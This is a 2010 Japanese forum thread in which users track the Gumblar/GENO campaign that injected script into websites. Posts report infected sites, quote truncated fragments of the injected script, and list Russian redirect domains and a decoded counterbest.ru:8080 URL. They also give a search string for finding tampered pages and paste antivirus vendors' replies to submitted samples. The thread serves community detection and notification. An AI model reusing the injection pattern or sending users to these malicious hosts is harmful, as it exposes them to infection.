>コチラ のサイト(どうしてそこ行く)
>http://blog.ecstudio.jp/ec_studio_blog/090522geno-virus.html

このブログ自体は既出だが・・・
Java(JRE)の事が抜けてるから、環境次第では穴が空いたままになる可能性がw

http://minkara.carview.co.jp/userid/666259/blog/16527332/
何故か人気がある社長の糞ブログwww

さすがみんカラー
※みんな頭カラッポ=略して「みんカラ」


866 :名無しさん@お腹いっぱい。:2010/01/27(水) 14:42:54
>>865
そのブログにコメント出してたら消されてるなw

867 :名無しさん@お腹いっぱい。:2010/01/27(水) 15:30:37
T-fal(ティファール)ウェブサイトご利用のみなさまへ

いつもT-falのウェブサイトをご利用くださいましてありがとうございます。
現在サイト内において、ページによって表示されにくい個所がございます。
ただ今改善の作業を進めておりますが、完全な復旧まで今しばらくお待ち
いただけます様、よろしくお願い申し上げます。

株式会社 グループセブ ジャパン

http://www.t-fal.co.jp/

ここのサイトも感染したのかな?


868 :名無しさん@お腹いっぱい。:2010/01/27(水) 15:58:24
>※みんな頭カラッポ=略して「みんカラ」

ワロタ
オカルトグッズが蔓延するサイトだからなぁ・・・

869 :名無しさん@お腹いっぱい。:2010/01/27(水) 16:02:06
ソースに記載のある
/krups/js/xtplugar.js
/krups/js/xtplug.js
が404になってる。改ざんされて消したのかもね。


870 :名無しさん@お腹いっぱい。:2010/01/27(水) 16:20:33
>>867
DoS攻撃くらってテンポってるだけじゃね?

【調理器具】ティファールの鍋、取っ手外れやけど 同様の事故3件 [10/01/26]
http://anchorage.2ch.net/test/read.cgi/bizplus/1264514894/

871 :名無しさん@お腹いっぱい。:2010/01/27(水) 16:41:20
BLOGって感染しないよね

872 :名無しさん@お腹いっぱい。:2010/01/27(水) 16:47:47
ティファールは前にも改ざんされたからね

873 :名無しさん@お腹いっぱい。:2010/01/27(水) 16:48:59
>>871
SQLインジェクション

あ、トレンドマイクロ的な意味じゃなくて

874 :名無しさん@お腹いっぱい。:2010/01/27(水) 17:22:52
これはひどい(アフィ的な意味で)
symantecgam.seesaa.net

875 :人柱になりたい人 ◆sage/xLnlI :2010/01/27(水) 17:31:35
WindowsXP
Windows98
Ubuntu 9.10

どれがいいんだろう

876 :名無しさん@お腹いっぱい。:2010/01/27(水) 17:34:28
>>875
Windows95

877 :名無しさん@お腹いっぱい。:2010/01/27(水) 17:34:55
ttp://www●mv-tokai●com/

nortonのアドオンが検出
これは改竄ですかね?(もしくは過去に改竄されていた?)

878 :人柱になりたい人 ◆sage/xLnlI :2010/01/27(水) 17:37:53
>>876
持ってない
よし、Windows98(アンチウイルスソフトなし)で踏んでこよう

879 :名無しさん@お腹いっぱい。:2010/01/27(水) 17:40:42
>>877
ざっと見た限りでは、少なくとも今は改竄は無いっぽい
キャッシュ見て来ます

880 :名無しさん@お腹いっぱい。:2010/01/27(水) 17:43:04
1月12日に「お詫びとお知らせ」pdfファイルがあった

スナック菓子に針1本混入だった

881 :877:2010/01/27(水) 17:44:50
malscript扱いになってるけどキャッシュのどこかに反応したっぽい
トップページでは出ないっす

882 :879:2010/01/27(水) 17:52:30
GoogleとBingのキャッシュ見たけどよく分からんかった
どこにひっかかってるんだろう…aguseでも反応無いけど

883 :名無しさん@お腹いっぱい。:2010/01/27(水) 17:59:03
>>882
今確認してみたらyahooのキャッシュでTrojan.Malscript!htmlと出ました

884 :名無しさん@お腹いっぱい。:2010/01/27(水) 18:04:16
あれ・・これは
ページ関係なしにyahoofs.jp(yahooのキャッシュ)自体が反応しているみたいだけど
これはnortonの駄目機能の誤爆かな
吊ってこようorz

885 :名無しさん@お腹いっぱい。:2010/01/27(水) 18:05:35
>>830

886 :名無しさん@お腹いっぱい。:2010/01/27(水) 18:05:54
カスペがGoogleに喧嘩売ったと思ったら
今度はノートンがYahoo!に喧嘩売ったのかw

887 :名無しさん@お腹いっぱい。:2010/01/27(水) 18:08:18
カスペは即日修正したがノートンは違うな

888 :名無しさん@お腹いっぱい。:2010/01/27(水) 18:13:30
まぁ24時間は様子見ようぜ。
あっちのYahoo!とYahoo!Japanとでスクリプト等が異なると対応は遅くなるだろうな。

889 :人柱になりたい人 ◆sage/xLnlI :2010/01/27(水) 18:16:53
Trojan.Malscript!htmlでググるとこんなんでました

http://www.virustotal.com/jp/analisis/9f09358064b50fc8c84d1b41f1890874e25eb85cd7d3ee20e33df83bbcc6583d-1262914771



890 :名無しさん@お腹いっぱい。:2010/01/27(水) 18:31:59
ノートンのネーミングは相当アバウトっつーか広範囲すぎるので
それでググってもあまり意味ないぞ

891 :名無しさん@お腹いっぱい。:2010/01/27(水) 18:34:26
>>874
http://search.yahoo.co.jp/search?b=1&n=10&ei=UTF-8&fr=ie8sc&p=link%3Ahttp%3A%2F%2Fsymantecgam.seesaa.net%2F

確かに酷い
そしてSEOが出来てる訳でもない

892 :名無しさん@お腹いっぱい。:2010/01/27(水) 18:57:05
>>884
なに?よく分からないけどヤフーのトップページ見ただけでもノートン反応するって事?
俺のNIS2009は何も反応しないけど

893 :名無しさん@お腹いっぱい。:2010/01/27(水) 19:10:20
>>892
反応するのはyahooのキャッシュ鯖
検索したページをキャッシュ表示すると出る

894 :名無しさん@お腹いっぱい。:2010/01/27(水) 19:15:27
>>858-859,>>861-862
リアルタイムで感染中だお。/*Exception*/
ttp://www.aguse.jp/result1.php?url=http%3A%2F%2Fwww%2Emag%2Dx%2Ecom%2Fscoopinfo%2F

895 :名無しさん@お腹いっぱい。:2010/01/27(水) 19:19:52
>>893
ありがとう、何も反応しないや、おかしいな

896 :名無しさん@お腹いっぱい。:2010/01/27(水) 19:26:32
>>895
NIS2010は2009のマイナーバージョンアップに見えて全くの別物仕様だからね
ただ現状の最新エンジンには環境依存の不具合があってうざい事この上ない

897 :名無しさん@お腹いっぱい。:2010/01/27(水) 20:23:47
>>894
これだけ感染を繰り返すのは更新に使用しているパソコンからウィルス駆除してないんじゃないのか。あとサーバレンタル元に連絡して一時閉鎖とかの対応取って貰うとかしないと駆除と感染のいたちごっこが続きそう

898 :名無しさん@お腹いっぱい。:2010/01/27(水) 20:49:25
ttp●//kousyu●cool●ne●jp/

MSEで"Trojan:JS/Redirector.BQ"と出たがGumblar?

899 :名無しさん@お腹いっぱい。:2010/01/27(水) 20:51:48
>>898
/*Exception*/

900 :名無しさん@お腹いっぱい。:2010/01/27(水) 21:01:49
>>899 thx

MyJVN バージョンチェッカで各ソフトは最新になってるけど大丈夫かな・・・

901 :名無しさん@お腹いっぱい。:2010/01/27(水) 21:44:54
口唇ヘルペスの治療や症状
www●pdmounted●com

リアルに感染中/*Exception*/

902 :名無しさん@お腹いっぱい。:2010/01/27(水) 21:49:29
>>898
めるした。

>>897
言いだしっぺの法貝リ
お願いします。m(_ _)m

903 :名無しさん@お腹いっぱい。:2010/01/27(水) 22:18:03
>>901
whoisからめるしました。

904 :名無しさん@お腹いっぱい。:2010/01/27(水) 22:36:57
Gumblar蔓延の要因の一つは感染サイトの告知の中の
トレンドマイクロのオンラインシュキャンの進めにあると思われます

トレンドマイクロの営利主義と感染サイトの告知が
感染PCを安全としGumblar蔓延を促進しているのではなかろうかと

PCデポでは無料診断と称してトレンドマイクロのオンラインシュキャンを行っていますが
これは、PCデポとトレンドマイクロの密接な繋がり上行われているものであり
安易にユーザに間違った安心感だけを与えているいるだけかと

PCがGumblarに感染しているか否かを真剣に診断しているとは
断じて言えるものでは無いのだとw

905 :名無しさん@お腹いっぱい。:2010/01/27(水) 22:39:10
シュキャンorz

906 :名無しさん@お腹いっぱい。:2010/01/27(水) 22:41:09
シュキャンダル

907 :名無しさん@お腹いっぱい。:2010/01/27(水) 22:48:36
>>897
パスワードすら変えてないんじゃないの。

しかし感染を告知しないで有料会員に感染者がいたらどうする気なんだろう。
気がつかずにいたら余計に被害が出るかもしれないのにいろんな意味で凄いわ。

908 :名無しさん@お腹いっぱい。:2010/01/27(水) 22:58:47
>>907
ソネットも見直してほしい…
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2121

>>25,>>52
/*LGPL*/がまだ残ってる。。。
ttp://www.aguse.jp/result1.php?url=http%3A%2F%2Fwww%2Easkulnet%2Ecom%2Faskularena%2Findex%2Ehtml

909 :名無しさん@お腹いっぱい。:2010/01/27(水) 23:26:30
ニュースでHPが改竄されたって言ってるじゃん。
あれって本当なの?
ハッカーが直接アクセスして改竄してるの?
てっきりウイルスがHP管理者のPCから勝手に
改竄してるんだと思ってたんだけど。

910 :名無しさん@お腹いっぱい。:2010/01/27(水) 23:29:05
ウイルスバスターのファイルスキャンで安心とか、アホだろ・・・
いや、うちのサイトのせいで、感染していないと言い張るためにわざとなのか?

911 :名無しさん@お腹いっぱい。:2010/01/27(水) 23:49:17
>>909
本当
直接アクセスって意味がわかってないと思うけどFTPで直接
管理者のPCがウイルス感染してることも事実だけどそこから改ざんではないです

912 :名無しさん@お腹いっぱい。:2010/01/28(木) 00:11:43
>>911
うむうむ。
改竄の原因はウイルスではないのね。

913 :名無しさん@お腹いっぱい。:2010/01/28(木) 03:05:57
埋め込まれるスクリプトでコメント無しのがあるそうで
<script> try{window.onload=function(){document.write('<div id=megaid>

で、このへんに飛ばされるらしい
extrafreeweb.ru
limowebcam.ru
supernetbet.ru
topmediasite.ru
yourtopfilms.ru

914 :名無しさん@お腹いっぱい。:2010/01/28(木) 03:30:26
それで突かれる脆弱性は何?
先週のIEのを含めて既知のものというか、普通にアップデートを怠らなければ問題ないのなら
コードの変更みたいな些事はもうどうでもいいよ。

915 :名無しさん@お腹いっぱい。:2010/01/28(木) 03:50:13
勝手に仕切るなw

916 :名無しさん@お腹いっぱい。:2010/01/28(木) 03:53:03
普通にアップデートを怠らなければ問題ない

917 :名無しさん@お腹いっぱい。:2010/01/28(木) 04:06:53
>>916
フツーはそうなんだけど今回アドビがねぇ。
0-day発覚から一ヶ月放置。
そのせいだろ今回の騒動は。

918 :名無しさん@お腹いっぱい。:2010/01/28(木) 04:14:43
アドビのjavascriptなんかデフォルトで無効にしとけっての

919 :名無しさん@お腹いっぱい。:2010/01/28(木) 06:46:27
感染したら
netstat -ap tcp 10
で監視できないのかな

920 :名無しさん@お腹いっぱい。:2010/01/28(木) 07:41:10
>>914
ソース見てコードないの確認してからNS許可してるんで、変更情報は自分には重要。

921 :名無しさん@お腹いっぱい。:2010/01/28(木) 09:17:45
>>908
askul代理店、まだ残ってんのか。
LGPL...

922 :名無しさん@お腹いっぱい。:2010/01/28(木) 10:15:09
新しい?
<script> try{window.onload=function(){document.write('<div id=megaid>addictinggames-com.z5x.ne</div>');以下長文略

923 :922:2010/01/28(木) 10:17:46
これに掛かると、サイトは真っ白になって
addictinggames-com.z5x.neとだけ表示される

924 :名無しさん@お腹いっぱい。:2010/01/28(木) 11:08:08
>>916
「普通にアップデート」したら、913のスクリプトが動かなくなるの?
それとも、このスクリプトの飛び先にある毒から守られるの?

925 :名無しさん@お腹いっぱい。:2010/01/28(木) 11:09:52
/*・・・*/無し最新型はDEBUG(仮称)と記す

伊豆諸島/伊豆大島/大島町/TOP/総合情報(DEBUG)
tp://park5●wakwak●com/~izushichi/oshima/index●html
※/~izushichi/mikura/index●htmlなど、複数あり

大田鋼業株式会社(DEBUG)
tp://www.oota●co●jp/index●html

RONI大好きサイト(Exception)
tp://roni●roselog●net

いろいろテスト(Exception)
tp://test●roselog●net/

テレ東アニメDVD通販情報(たぶんDEBUG)
tp://anime●gyomu-yo●net/
※絶賛崩壊中w

スズキの中古車探し(DEBUG)
tp://sunrise●2pg●in/suzukiucar/index2●html
※コードまる見えw

各所につーほヨロ
また潜りに逝ってくる・・・

926 :名無しさん@お腹いっぱい。:2010/01/28(木) 11:18:05
価格比較 GIOS ジオス(崩壊仕様)
tp://shop●relax-living●net
※/bike11/にGNU GPL

エラー崩壊は新コードの挿入ミスかな?


927 :名無しさん@お腹いっぱい。:2010/01/28(木) 11:26:29
>>925
大田鋼業株式会社

電話に出たババア
「私たちにはそんなことは分かりません」とガチャ切り w

928 :名無しさん@お腹いっぱい。:2010/01/28(木) 11:44:14
>>927
マジかwひでぇ会社だw

929 :名無しさん@お腹いっぱい。:2010/01/28(木) 11:50:57
>>927
ふいたwwww

930 :名無しさん@お腹いっぱい。:2010/01/28(木) 11:51:13
>>927
ちょwww

931 :名無しさん@お腹いっぱい。:2010/01/28(木) 11:56:43
従業員10名の零細企業だからそんなもんだろ

932 :名無しさん@お腹いっぱい。:2010/01/28(木) 11:57:01
>>864
エストニアのESET?

933 :名無しさん@お腹いっぱい。:2010/01/28(木) 11:57:34
社内ネットワーク内のPCからFTPでアップロードしている場合、
そのPCが感染して無くても他のPCが感染してたらパス抜かれる?

934 :名無しさん@お腹いっぱい。:2010/01/28(木) 12:10:33
>>931
だからってガチャ切りは普通しないだろ

935 :名無しさん@お腹いっぱい。:2010/01/28(木) 12:13:19
詐欺とか思われたんだろ
aguseで調べるとタイムアウトだらけだ

936 :名無しさん@お腹いっぱい。:2010/01/28(木) 12:26:58
大田鋼業株式会社(笑)のコードだが

tp://counterbest●ru:DEBUG/wiktionary●org/wiktionary●org/sweetim●com/nhl●com/google●com/

replace(/DEBUG/g, '8080')

tp://counterbest●ru:8080/wiktionary●org/wiktionary●org/sweetim●com/nhl●com/google●com/

この認識で良いのかな?

937 :名無しさん@お腹いっぱい。:2010/01/28(木) 12:30:07
闇金業者の融資だと思われたんだな

938 :名無しさん@お腹いっぱい。:2010/01/28(木) 12:41:31
例どんな相手でも普通の企業でガチャ切りなんてありえん

939 :名無しさん@お腹いっぱい。:2010/01/28(木) 13:03:43
立て続けに何人もの「善意の第三者」から掛かってきていたとか

940 :名無しさん@お腹いっぱい。:2010/01/28(木) 13:10:43
KDDIのマイライン勧誘電話はガチャ切りしてる。
そうしないと延々喋り続けるから。

941 :名無しさん@お腹いっぱい。:2010/01/28(木) 14:32:18
いやいや町工場とか土建屋なんかそんな対応がデフォだぞ

942 :名無しさん@お腹いっぱい。:2010/01/28(木) 15:10:44
つーか、もうNoScriptのホワイトリストとかIEの信頼済ゾーンとか意味ない感じだよな。
一時許可だけは含めた全拒否か、突かれる穴だけを埋めて全許可の二択だわ。

943 :名無しさん@お腹いっぱい。:2010/01/28(木) 15:26:24
信じられぬと 嘆くよりも
サイトを信じて 感染するほうがいい〜

944 :名無しさん@お腹いっぱい。:2010/01/28(木) 15:27:31
それはない。

945 :名無しさん@お腹いっぱい。:2010/01/28(木) 15:29:20
求めないで 対策なんか
臆病者の 言いわけだから〜

946 :名無しさん@お腹いっぱい。:2010/01/28(木) 15:40:05
あると思います。

947 :名無しさん@お腹いっぱい。:2010/01/28(木) 15:43:27
>>942
おれもそう思って、NoScriptをアンインストールした
そうしたら、FireFoxがけっこう軽くなったよw
穴を詰めておいて、これは絶対やばいだろと思うところは
仮想環境で行くことにした
で、最近のメインンブラウザはチョロメになってる

948 :名無しさん@お腹いっぱい。:2010/01/28(木) 15:44:30
かっけっすね

949 :名無しさん@お腹いっぱい。:2010/01/28(木) 15:50:18
外向き8080遮断でいいんじゃねーの?

950 :名無しさん@お腹いっぱい。:2010/01/28(木) 15:51:44
>>922と全く同じコードが埋め込まれてたんだが(もう復旧済み)
これって表示するだけでウイルスやバックドア感染はしないの?

951 :名無しさん@お腹いっぱい。:2010/01/28(木) 15:55:11
穴があれば感染する。

952 :名無しさん@お腹いっぱい。:2010/01/28(木) 15:57:34
俺のアナルはゆるゆるだ

953 :名無しさん@お腹いっぱい。:2010/01/28(木) 15:58:21
>>951
ありがとう…先方に警告出すわ…
コード解析しても意味ないのかな。仕方がいまいち分からん
先方の鯖管が報告してればいいけど

954 :名無しさん@お腹いっぱい。:2010/01/28(木) 16:05:22
>>925
izushichi めるしました。
oota 直っているようです。ぐぐるキャッシュに/*LGPL*/
roni、test roselog●netは全滅か?、whoisからめるしました。
sunrise●2pg リンク先はみなかったことにして、whoisからめるしました。

955 :名無しさん@お腹いっぱい。:2010/01/28(木) 16:14:09
>>922
>>950
みたいに画面真っ白表示するのってなんだろう
感染してるってブラウザで丸わかりじゃ意味ないんじゃないのかな?
愉快犯ってことなのかな

956 :名無しさん@お腹いっぱい。:2010/01/28(木) 16:18:24
真っ白表示された時点で(穴があれば)感染しているから目的は達成されるだろ。
愉快犯ってことにして閲覧者には無害ですとかアナウンスしたいのかもしれんが
覚悟決めろや。

957 :名無しさん@お腹いっぱい。:2010/01/28(木) 16:28:43
いやいや、普通ならなるべく多く感染させたいから隠すだろ
感染させてやったって表示してるんだから愉快犯(反応を楽しむ)なんじゃね

当然感染もするけどな

958 :名無しさん@お腹いっぱい。:2010/01/28(木) 16:30:09
愉快犯=実害がないわけじゃないだろjk

959 :名無しさん@お腹いっぱい。:2010/01/28(木) 16:31:37
>>926
whoisからめるしました。
飛び先は同じなのでコードの貼り付け失敗かも

960 :名無しさん@お腹いっぱい。:2010/01/28(木) 16:37:51
ウィルス作る奴が何考えてるかなんてわからねーよ

961 :名無しさん@お腹いっぱい。:2010/01/28(木) 16:45:44
自サイト感染してた知人、ページ復旧してもう安心な気持ちになってる。
話突っ込んだけどもう元に戻したしって危機感もってないみたい。
いや感染してたら危ないって!って言っていいんだよね?
何故あんなに自信満々なんだ……

962 :名無しさん@お腹いっぱい。:2010/01/28(木) 16:57:19
お前の説明がヘタクソだから

963 :名無しさん@お腹いっぱい。:2010/01/28(木) 17:01:10
>>927
吹いた

964 :名無しさん@お腹いっぱい。:2010/01/28(木) 17:04:54
>>961
知人ともども、so-netの記事を読んでみるといいと思う
このへんとか
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2130

965 :名無しさん@お腹いっぱい。:2010/01/28(木) 17:05:39
sunrise●2pg●inは
<!--<script>--> (省略) <!--</script>-->
になってるのは何なんだろw

966 :名無しさん@お腹いっぱい。:2010/01/28(木) 17:07:45
superhighest.ru:DEBUG ってなんだよw

967 :名無しさん@お腹いっぱい。:2010/01/28(木) 17:12:34
DEBUGだけにまだ試行中なんだよ

968 :名無しさん@お腹いっぱい。:2010/01/28(木) 17:13:59
>>966
(/DEBUG/g, '8080')

969 :名無しさん@お腹いっぱい。:2010/01/28(木) 17:27:05
>>965
たぶんだけど、やられたことは知っていて
証拠保全とか何か理由があってコメントアウトしたんじゃないかな。

970 :名無しさん@お腹いっぱい。:2010/01/28(木) 17:56:16
>>922 >>950
これって新しいやつ?報告見たことないけど

971 :名無しさん@お腹いっぱい。:2010/01/28(木) 17:58:31
>>970
新しいやつ
>>925のDEBUGで報告されてる

972 :名無しさん@お腹いっぱい。:2010/01/28(木) 18:00:01
ローカルの8080ポートを閉じるのって効果があるの?
リダイレクト先にロシアサーバの8080ポートが使われるってだけで、ローカルの8080ポートは
関係ないと思っていたけど違うのかな?

973 :名無しさん@お腹いっぱい。:2010/01/28(木) 18:09:50
>>933
ぬかれる

974 :名無しさん@お腹いっぱい。:2010/01/28(木) 18:11:41
>>972
ない

975 :名無しさん@お腹いっぱい。:2010/01/28(木) 18:15:49
>>970
この記事にあるコードがそうだと思う
http://www3.atword.jp/gnome/2010/01/27/8080-gnu-gpl-it-changed-thier-method-again/

976 :名無しさん@お腹いっぱい。:2010/01/28(木) 18:34:37
DEBUG型、未だどこも検知せず…orz
http://www.virustotal.com/analisis/6ad7ae0423e2d87d794d99690420b280db533a8409f6e91067ae9bb9fd400815-1264671185

avastには提出しました。他のもよろしく

977 :名無しさん@お腹いっぱい。:2010/01/28(木) 18:48:10
>>976
http://pc11.2ch.net/test/read.cgi/sec/1258817697/329
で、やってるっぽい

978 :名無しさん@お腹いっぱい。:2010/01/28(木) 18:57:33
>>972
ローカル8080開けてるヤツなんてそんないないからな

979 :名無しさん@お腹いっぱい。:2010/01/28(木) 19:56:51
提出した人はうpロダに物を上げてもらえんか?
対応してないAVソフトのユーザーは、それ使って検体の提出ができるからさ

980 :名無しさん@お腹いっぱい。:2010/01/28(木) 20:04:35
>>976
>>925izushichiの分
かすぺ @返信日時:17:34
> Hello,
>
> index.htm_, mikura_index.html_, oshima_index.html_, toshima_index.html_ - Trojan.JS.Agent.bcb
>
> New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.
>
> Please quote all when answering.
> The answer is relevant to the latest bases from update sources.
> --
> Best regards, Sergey Prokudin
> Virus analyst, Kaspersky Lab.

ESET @返信日時:19:00
> Thank you for your submission.
> The detection for this threat will be included in our next signature update.
>
> index.htm - JS/TrojanDownloader.Agent.NRP trojan
> mikura_index.html - JS/TrojanDownloader.Agent.NRP trojan
> oshima_index.html - JS/TrojanDownloader.Agent.NRP trojan
> toshima_index.html - JS/TrojanDownloader.Agent.NRP trojan
>
> Regards,
>
> Daniel Novomesky
> Virus Researcher
> ESET spol. s r.o.

981 :名無しさん@お腹いっぱい。:2010/01/28(木) 20:18:43
>>925gyomu-yoの分
Fortinet @返信日時:16:09 (あちらの時刻かも。)
> Dear Customer,
>
> Thank you for submitting the sample to Fortinet. We have recently added detection for this malware. The signature will be included in the next regular update.
>
> The sample you submitted will be detected as follows:
> index.html - JS/IFrame.FAC!tr
>
> Best Regards,
> AV Lab - Bob

982 :名無しさん@お腹いっぱい。:2010/01/28(木) 20:20:24
>>981補足
anime●gyomu-yo●netではなくgyomu-yo●netです。

983 :名無しさん@お腹いっぱい。:2010/01/28(木) 20:43:39
次スレは重複したここでいいのか?

【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】
http://pc11.2ch.net/test/read.cgi/sec/1263865118/

984 :名無しさん@お腹いっぱい。:2010/01/28(木) 20:49:42
>>922
それ今朝やられた。自分とこの場合、一瞬正規のページが表示された後に、nhl-com.stc.com.sa.googleと表示。
avast!で検出されず、aguseで調べたら、「ガブンラー感染の恐れあり」。
今年に入って、これで2回目です。
前回はユーザーからメールと電話で報告を受け、今回は運良く自分で見つけたけど、これって、FTPのパスワードとかの
設定変えたほうがいいのかな?ちなみに鯖はXREAですw

985 :名無しさん@お腹いっぱい。:2010/01/28(木) 20:50:17
>>984
ぉぃw

986 :名無しさん@お腹いっぱい。:2010/01/28(木) 20:50:50
毎日変えろ糞が

987 :名無しさん@お腹いっぱい。:2010/01/28(木) 20:53:49
改ざんされたソース保存してて、ブラウザで閲覧してもまだavast!では検出されませんね。
反映されるまで時間かかるのかな?

988 :925:2010/01/28(木) 20:55:53
検索ワード:".replace(/\(|#|@|&|\^|\$|\)|\!/ig,"

・やふー
ttp://search.yahoo.co.jp/search?p=%22.replace%28%2F%5C%28%7C%23%7C%40%7C%26%7C%5C%5E%7C%5C%24%7C%5C%29%7C%5C%21%2Fig%2C%22&ei=UTF-8&meta=fl%3D3&pstart=1&fr=top_ga1_sa&b=1

・えきさいと
ttp://www.excite.co.jp/search.gw?search=%22.replace%28%2F%5C%28%7C%23%7C%40%7C%26%7C%5C%5E%7C%5C%24%7C%5C%29%7C%5C%21%2Fig%2C%22&submit=%8C%9F%8D%F5&target=combined&look=excite_jp&sstype=excite_d

つーほしてくれた人>乙です

989 :名無しさん@お腹いっぱい。:2010/01/28(木) 20:55:56
987=984です。

>>986
パスワードの変更の仕方がよくわからんのよ

990 :984:2010/01/28(木) 21:03:06
>>988
けっこう改ざんされてるとこあるんだね。通報してくれた人本当に乙です

991 :名無しさん@お腹いっぱい。:2010/01/28(木) 21:06:28
>>988
その中から探してきてくれたあなたこそ乙ですぽ。

992 :名無しさん@お腹いっぱい。:2010/01/28(木) 21:07:31
>>988
J U M P E R Z . N E T - BBS -
感染のオンパレードわろた

993 :名無しさん@お腹いっぱい。:2010/01/28(木) 21:07:46
>>984
XREAってこれのこと?
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2135

994 :984:2010/01/28(木) 21:09:00
パスワード変更の方法が分かりました。これからは定期的にパスワード変更します。

995 :名無しさん@お腹いっぱい。:2010/01/28(木) 21:09:23
次スレ誘導
http://pc11.2ch.net/test/read.cgi/sec/1263865118/
※このスレが重複したやつだが気にすんな

996 :984:2010/01/28(木) 21:12:40
>>993
今回の改ざんはそうかもしれないですね。でも前回は、今月の中旬頃でした

997 :名無しさん@お腹いっぱい。:2010/01/28(木) 21:15:26
>>996
OSのクリーンインストールもしてね。

998 :名無しさん@お腹いっぱい。:2010/01/28(木) 21:20:49
So-net 三つの謎
※中の人ねらー疑惑
※何故マカフィーなのか
※中の人は美少女なのかオサーンなのか

999 :名無しさん@お腹いっぱい。:2010/01/28(木) 21:23:41
>>998
3番目が最重要だにゃ。

↓1000どぞー

1000 :名無しさん@お腹いっぱい。:2010/01/28(木) 21:24:09
>※中の人は美少女なのかオサーンなのか
これだけは判る、きっとオサーンなのだw

1000ゲト!

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

229 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)